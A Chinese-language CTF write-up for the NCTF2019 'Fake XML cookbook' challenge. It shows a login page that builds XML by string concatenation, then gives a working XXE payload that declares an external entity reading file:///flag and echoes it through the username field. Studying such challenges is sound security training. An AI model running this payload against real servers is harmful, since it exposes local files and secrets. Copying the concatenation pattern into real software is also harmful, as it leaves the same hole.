[NCTF2019]Fake XML cookbook [XXE注入]

题目源代码 

 
function doLogin(){
	var username = $("#username").val();
	var password = $("#password").val();
	if(username == "" || password == ""){
		alert("Please enter the username and password!");
		return;
	}
	
	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

漏洞点： 

var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 

可以自己构造xml语句填进去，导致xml注入，而且在TIPS中会显示(用户名)登录错误

会回显用户名，以用户名作为回显位，回显flag 

 构造payload，这样登录错误就会在<msg>里面显示用户名，但是用户名引用了XML外部实体，所以会显示file:///flag的内容

<!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///flag">]>定义外部实体的名字以及地址

<!DOCTYPE note [
  <!ENTITY xxe SYSTEM "file:///flag">
]>
<user>
<username>
&xxe;   //注意这里有 ; 
</username>
<password>111</password></user>

一开始笨了吧唧的光在输入框里构造payload了，完全忘了还可以bp抓包，把<!DOCTYPE note [
  <!ENTITY xxe SYSTEM "file:///flag">]>放到前面去，任意修改位置